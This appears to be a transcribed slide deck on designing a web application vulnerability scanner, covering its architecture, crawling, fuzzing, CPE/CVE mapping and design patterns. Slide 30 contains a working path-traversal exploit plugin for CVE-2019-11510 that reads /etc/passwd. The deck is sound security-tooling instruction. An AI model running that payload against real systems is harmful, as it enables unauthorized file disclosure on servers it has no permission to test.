This document discusses building a high-performance web application vulnerability scanner (WAVS). It begins with an introduction of the speaker and the agenda. It then defines what a WAVS is and explains why both penetration testers and businesses need one to discover vulnerabilities. It explains why building your own WAVS is typically not recommended and reviews common challenges. It proposes an architecture with core and plugin components and discusses three approaches: crawling and fuzzing, CPE and CVE mapping, and public exploit testing. It closes with recommendations on programming languages and code design patterns, and with challenges such as JavaScript crawling, high overhead, false positives, and other considerations.
5. Web Application Vulnerability Scanners are
automated tools that scan web applications, normally
from the outside, to look for security vulnerabilities
such as cross-site scripting (XSS), SQL injection, command
injection, path traversal, and insecure server
configuration.
7. › Discover attack surfaces (URLs, headers, open
ports)
› Gather information about the target (OS, Web
frameworks, built-in technologies, sitemap)
› Detect non-business logic vulnerabilities (SQLi, XSS,
SSTI)
› Detect misconfigurations
For pentesters
8. › Get the same advantages that pentesters get
› See an overview of security risks in web applications
› Integrate findings into vulnerability management
› Save cost against basic security flaws
For businesses
10. NO
Unless you do it for educational purposes or for a clear
commercial purpose
11. › User doesn’t like the way scanner X implements a feature
› User has free time
› User starts writing his own scanner and usually succeeds in implementing the one
feature he really needed
› The new web application scanner only works on a small subset of sites, since it doesn’t
know how to extract links other than the ones in tags, or can’t handle broken HTML, or is
too slow to be used on any site with more than a few hundred pages.
› The creator of the new tool maintains it for six months
› The project dies when the project lead finds more interesting things to do, finds a tool
that did what he needed, changes jobs, etc.
The usual timeline
13. Security testing in the wild
Discovery
Vulnerability Analysis
Exploitation
Follow the tactical exploitation
14. Security testing in the wild: Discovery
Discovery is the process of gathering as much
background information about the target as
possible, including hosts, operating systems,
topology, etc.
15. Security testing in the wild: Vulnerability Analysis
Vulnerability analysis is the process of
discovering flaws in systems and applications
that can be leveraged by an attacker.
16. Security testing in the wild: Exploitation
Exploitation focuses solely on establishing
access to a system or resource by bypassing
security restrictions.
17. › Scalability: New vulnerability signatures are easy
to add
› Stability: Low RAM and CPU usage
› Reliability: Vulnerabilities are found with a low
false-positive rate
Requirements
19. Architecture
Core Plugins
Apply the plugin-based architecture
Core
› Manages the main flow
› Coordinates processes and threads
› Provides APIs for plugins to reuse
Plugins
› Find flaws directly
› Get data from the core
› Share gathered information with other components/plugins via the core APIs
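The split between core and plugins can be sketched as follows. This is only an illustration under assumptions: the names Core, Plugin, share, and get are hypothetical and are not taken from the scanner described in these slides, and the header value is a placeholder rather than a real finding.

```python
from abc import ABC, abstractmethod


class Core:
    """Hypothetical core: runs the plugins and owns the data they share."""

    def __init__(self):
        self.plugins = []
        self.knowledge = {}  # information shared between plugins

    def register(self, plugin):
        plugin.core = self  # plugins reach shared data only through the core
        self.plugins.append(plugin)

    def share(self, key, value):
        """Core API: publish a piece of gathered information."""
        self.knowledge.setdefault(key, []).append(value)

    def get(self, key):
        """Core API: read a copy of what other plugins have published."""
        return list(self.knowledge.get(key, []))

    def run(self, target):
        # The core manages the main flow; plugins do the actual work.
        for plugin in self.plugins:
            plugin.run(target)


class Plugin(ABC):
    core = None  # set by Core.register()

    @abstractmethod
    def run(self, target):
        """Do the plugin's work against the target."""


class HeaderPlugin(Plugin):
    def run(self, target):
        # Placeholder value standing in for a real HTTP response header.
        self.core.share('headers', 'Server: placeholder')


class ReportPlugin(Plugin):
    def __init__(self):
        self.seen = []

    def run(self, target):
        # Reads what earlier plugins shared, without knowing which plugin did it.
        self.seen = self.core.get('headers')
```

Because plugins only talk to the core, a new plugin can be added without touching the existing ones.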
20. Plugins
› Infrastructure: Gather all information about the target, such as sitemap, headers, OS,
web framework, etc. It runs in a loop in which the output of one discovery plugin is sent
as input to the next plugin
› Subdomain: Find all subdomains of the root domain
› Audit: Take the output of the discovery plugins and find vulnerabilities by fuzzing
› Attack: Try to exploit the target by using confirmed findings from the audit plugins
› Other plugins: Output, mangle, evasion, grep, brute force
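The discovery loop described above, where the output of one plugin becomes the input of the next, might look like the sketch below. It assumes, purely for illustration, that a discovery plugin is a callable that takes one item and returns an iterable of newly found items; run_discovery and max_rounds are hypothetical names.

```python
def run_discovery(seed, plugins, max_rounds=10):
    """Feed every newly found item back into all plugins until nothing new appears."""
    known = {seed}
    pending = [seed]
    for _ in range(max_rounds):  # hard cap so a misbehaving plugin cannot loop forever
        if not pending:
            break
        found = []
        for item in pending:
            for plugin in plugins:
                for result in plugin(item):
                    if result not in known:
                        known.add(result)
                        found.append(result)
        pending = found  # only new items are fed into the next round
    return known
```

The loop stops as soon as a full round produces nothing new, so its cost grows with the number of distinct findings rather than with the number of rounds.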
23. Crawling and Fuzzing
› The main component is a crawler
› The crawler starts from the seed URL and finds all reachable URLs of the target
[Diagram: crawler flow. Labels: Seed URL, Requester, HTTP Response, Parse Document, URL, "The URL is in the queue?", "The URL is not in the queue", URL Queue, Pack, Fuzzable Request]
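A minimal sketch of such a crawler, using only the Python standard library, is shown below. It is an assumption-laden illustration and not the crawler from the talk: fetch is a hypothetical callable that maps a URL to its HTML text (or None on failure), so the requester can be swapped out, and the crawl is limited to the seed's host.

```python
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urldefrag, urljoin, urlparse


class LinkParser(HTMLParser):
    """Collects href and src attribute values from a document."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ('href', 'src') and value:
                self.links.append(value)


def crawl(seed_url, fetch, max_pages=100):
    """Breadth-first crawl that stays on the seed's host.

    `fetch` is a hypothetical callable: URL -> HTML text, or None on failure.
    """
    host = urlparse(seed_url).netloc
    queue = deque([seed_url])
    seen = {seed_url}  # answers "is the URL already in the queue?"
    fetched = 0
    while queue and fetched < max_pages:
        url = queue.popleft()
        fetched += 1
        html = fetch(url)
        if html is None:
            continue
        parser = LinkParser()
        parser.feed(html)
        for link in parser.links:
            # Resolve relative links and drop the #fragment part.
            absolute, _fragment = urldefrag(urljoin(url, link))
            if urlparse(absolute).netloc == host and absolute not in seen:
                seen.add(absolute)
                queue.append(absolute)
    return seen
```

This sketch only follows href and src attributes in static HTML; links generated by JavaScript are not found.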
25. Crawling and Fuzzing
› Normally used to find 0-day vulnerabilities or common vulnerabilities (SQLi, XSS,
etc.)
› Implementing a new plugin is complex
› Produces a high rate of false positives
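As a rough illustration of the fuzzing step, the sketch below places a probe string into one query parameter at a time and reports the parameters whose value comes back in the response. The function names, the probe string, and the fetch callable (URL -> response body text) are all hypothetical.

```python
from urllib.parse import parse_qsl, urlencode, urlparse, urlunparse


def mutate(url, payload):
    """Yield (parameter, mutated_url) with the payload placed in one parameter at a time."""
    parts = urlparse(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    for i, (name, _value) in enumerate(params):
        mutated = params[:i] + [(name, payload)] + params[i + 1:]
        yield name, urlunparse(parts._replace(query=urlencode(mutated)))


def find_reflections(url, fetch, payload='<wavs-probe-1337>'):
    """Return the parameters whose payload is echoed back unmodified.

    `fetch` is a hypothetical callable: URL -> response body text (or None).
    """
    return [name for name, mutated in mutate(url, payload)
            if payload in (fetch(mutated) or '')]
```

A reflected probe is only a hint that the parameter may be injectable, not proof of a vulnerability, which is one reason this approach tends to produce false positives.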
26. CPE and CVE mapping
› Detect the name and version of every technology and framework the target uses
› Convert the findings to CPE (Common Platform Enumeration) strings
› CPE is a structured naming scheme for information technology systems, software,
and packages.
› Find the CVEs that map to those CPEs
cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*
cpe:/o:linux:linux_kernel:2.6.0
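The two strings above are the CPE 2.3 formatted string and the older CPE 2.2 URI for the same product. A simplified sketch of producing them from a detected name and version follows. The function names are hypothetical, and the sketch assumes plain components: it does not handle the escaping of special characters or the packed edition field of CPE 2.2.

```python
def to_cpe23(part, vendor, product, version):
    """Build a CPE 2.3 formatted string; the 7 unknown attributes are wildcards."""
    fields = [part, vendor, product, version] + ['*'] * 7
    return 'cpe:2.3:' + ':'.join(fields)


def cpe22_to_cpe23(uri):
    """Convert a simple CPE 2.2 URI to a CPE 2.3 formatted string.

    Simplification: percent-encoded characters and packed editions ('~')
    are rejected instead of being converted.
    """
    prefix = 'cpe:/'
    if not uri.startswith(prefix):
        raise ValueError('not a CPE 2.2 URI: ' + uri)
    fields = uri[len(prefix):].split(':')
    if len(fields) > 7 or any('~' in f or '%' in f for f in fields):
        raise ValueError('unsupported CPE 2.2 URI: ' + uri)
    fields = [f if f else '*' for f in fields]  # an empty component means "any"
    fields += ['*'] * (11 - len(fields))        # CPE 2.3 has 11 attributes
    return 'cpe:2.3:' + ':'.join(fields)
```

With the CPE string in hand, the CVE lookup becomes a match against whatever vulnerability database the scanner uses.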
27. CPE and CVE mapping
› Sometimes a name and version cannot be converted to CPE format
› You have to build your own threat intelligence or vulnerability database
28. Public exploit testing
› Also known as blind testing
› Run known exploit code against your target. If the response matches the signature, the
target is vulnerable
› Detecting technologies is not strictly necessary
29. Public exploit testing
› Normally used to find 1-day vulnerabilities, CVEs, and known public exploits for
specific applications or frameworks
› Implementing a new plugin is easy
› Produces a low rate of false positives
30. Public exploit testing
class Cve201911510(AttackPlugin):
    def __init__(self):
        super().__init__()
        self.path = '/dana-na'
        self.payload = self.generate_payload()

    def generate_payload(self, file_name=''):
        # Default to a file whose content is easy to recognize.
        if file_name == '':
            file_name = '/etc/passwd'
        payload = f'/../dana/html5acc/guacamole/../../../../../../..{file_name}?/dana/html5acc/guacamole/'
        return payload

    def real_exploit(self, url):
        # path_as_is=True keeps the requester from normalizing the '../' sequences.
        resp = self.requester.get(url + self.payload, path_as_is=True)
        # Signature: the first entry of /etc/passwd appears in the response.
        if 'root:x:0' in resp.text:
            return True
        return False
32. Programming languages
› The main language depends on the environment in which the scanner is installed
› If the scanner is distributed as a desktop app, it should be written in a low-level
language to protect against reverse engineering. Python is a bad choice.
› If the scanner is delivered as a service, the language is not a problem
› The core can be written in any programming language
› The plugins should be written in a scripting language such as Python, Lua, or even
your own language, for scalability
33. Code design
› Design patterns are very important if you’d like to scale up the scanner
class CoreStrategy(object):
    def start(self):
        try:
            target = self._core.base_target
            if not target.is_valid():
                logger.error('The target is not valid')
                return
            # URL targets also get the audit (fuzzing) phase.
            if target.get_type() == TYPE_URL:
                self.discover()
                self.attack()
                self.audit()
            else:
                self.discover()
                self.attack()
        except ScanMustStopException:
            logger.error('[!] The scan will be finished now')
        except Exception:
            # logger.error() needs a message to log.
            logger.error('Unhandled error during the scan')
Strategy Pattern
34. Code design
› Design patterns are very important if you’d like to scale up the scanner
def real_exploit(self, url):
    """
    This method MUST be implemented on every plugin.
    :param url: URL to test whether it can be exploited or not
    :return: True if it is vulnerable, otherwise False.
    """
    msg = 'Plugin is not implementing required method real_exploit'
    raise NotImplementException(msg)
Abstract Pattern
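The method above reports a missing implementation only when it is called. As an alternative, and not the approach shown on the slide, Python's standard abc module can reject an incomplete plugin as soon as it is instantiated. In this sketch AttackPlugin is re-declared for illustration, and IncompletePlugin and AlwaysSafePlugin are hypothetical names.

```python
from abc import ABC, abstractmethod


class AttackPlugin(ABC):
    """Illustrative base class; not the AttackPlugin from the slides."""

    @abstractmethod
    def real_exploit(self, url):
        """Return True if the target at `url` is vulnerable, otherwise False."""


class IncompletePlugin(AttackPlugin):
    pass  # forgot to implement real_exploit


class AlwaysSafePlugin(AttackPlugin):
    def real_exploit(self, url):
        return False


def try_create(plugin_class):
    """Return an instance, or None if the plugin misses a required method."""
    try:
        return plugin_class()
    except TypeError:  # raised by ABC when abstract methods are not overridden
        return None
```

With this variant a broken plugin fails when it is loaded, before any request is sent to the target.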
36. Code design
› Design patterns are very important if you’d like to scale up the scanner
def factory(module_name, *args):
    """
    This function creates an instance of a class that's inside a module
    with the same name.
    Example:
    >>> cve_2015_4852 = factory('exploits.plugins.attack.cve_2015_4852')
    >>> cve_2015_4852.get_name()
    'CVE-2015-4852'
    :param module_name: Which plugin do you need?
    :return: An instance.
    """
Factory Pattern
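The slide shows only the docstring of factory. One possible body, written here as an assumption and not taken from the talk, imports the module with importlib and looks up a class whose name equals the last component of the module path.

```python
import importlib


def factory(module_name, *args):
    """Create an instance of the class that shares its name with its module.

    Sketch only: assumes 'pkg.sub.foo' defines a class named 'foo'.
    """
    module = importlib.import_module(module_name)
    class_name = module_name.rsplit('.', 1)[-1]
    try:
        plugin_class = getattr(module, class_name)
    except AttributeError:
        raise ImportError(
            f'{module_name} does not define a class named {class_name}'
        ) from None
    return plugin_class(*args)
```

The standard library's datetime module happens to follow the same naming rule, so factory('datetime', 2020, 1, 2) returns a datetime.datetime instance and can serve as a quick check. Loading plugins by name this way lets the core discover new plugins without importing each one explicitly.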
38. › A traditional crawler does not work with JavaScript-based websites
or single-page applications (Angular, Vue.js, React)
JavaScript crawling
39. › Available solutions: Use headless browsers to render JavaScript
on the client side (Chromium, Firefox, PhantomJS, Splash, etc.)
› Cons: Those engines take up a lot of computer resources
(RAM, CPU) and render slowly
JavaScript crawling
40. › Scanners normally consume a lot of
› I/O, since they send many requests to external hosts
› CPU, since responses have to be analyzed continuously
› RAM, because of multi-threaded designs or memory that is
never freed
High overhead
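One common way to keep this overhead bounded, offered here as a sketch and not as the approach taken in the talk, is a fixed-size worker pool that keeps only the positive findings and discards everything else. scan_all and check are hypothetical names; check is assumed to take a URL and return True when the URL is vulnerable.

```python
from concurrent.futures import ThreadPoolExecutor


def scan_all(urls, check, max_workers=8):
    """Run `check(url)` over all URLs with a fixed number of worker threads."""
    urls = list(urls)
    findings = []
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        # pool.map yields results in input order, so zip pairs them correctly.
        for url, vulnerable in zip(urls, pool.map(check, urls)):
            if vulnerable:
                findings.append(url)  # keep the URL only, not the response
    return findings
```

The max_workers value caps the number of concurrent connections and threads, trading scan speed for a predictable resource ceiling.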
44. › Many web applications do not handle requests the way we
expect (e.g., they return status code 200 for pages that are not found)
› Connection delays
› The web content itself contains vulnerability signatures
False positives
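For the first cause, a page that returns status code 200 although it does not exist, one possible countermeasure is to request a random path that almost certainly does not exist and compare later responses against it. The sketch below assumes a hypothetical fetch callable (URL -> response body text); the function name and the 0.9 threshold are illustrative choices, not values from the talk.

```python
import uuid
from difflib import SequenceMatcher
from urllib.parse import urljoin


def looks_like_soft_404(base_url, candidate_body, fetch, threshold=0.9):
    """Compare a body with the response for a random, surely missing path.

    `fetch` is a hypothetical callable: URL -> response body text.
    """
    missing_url = urljoin(base_url, '/' + uuid.uuid4().hex)
    baseline = fetch(missing_url)
    similarity = SequenceMatcher(None, baseline, candidate_body).ratio()
    return similarity >= threshold
```

A plugin can call this before reporting a finding and discard responses that are nearly identical to the site's "not found" page.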
46. › Identify the type of each form field (email, phone, name, city)
› Authenticate to the target
› Crawl and fuzz APIs
› Deal with business logic vulnerabilities
Others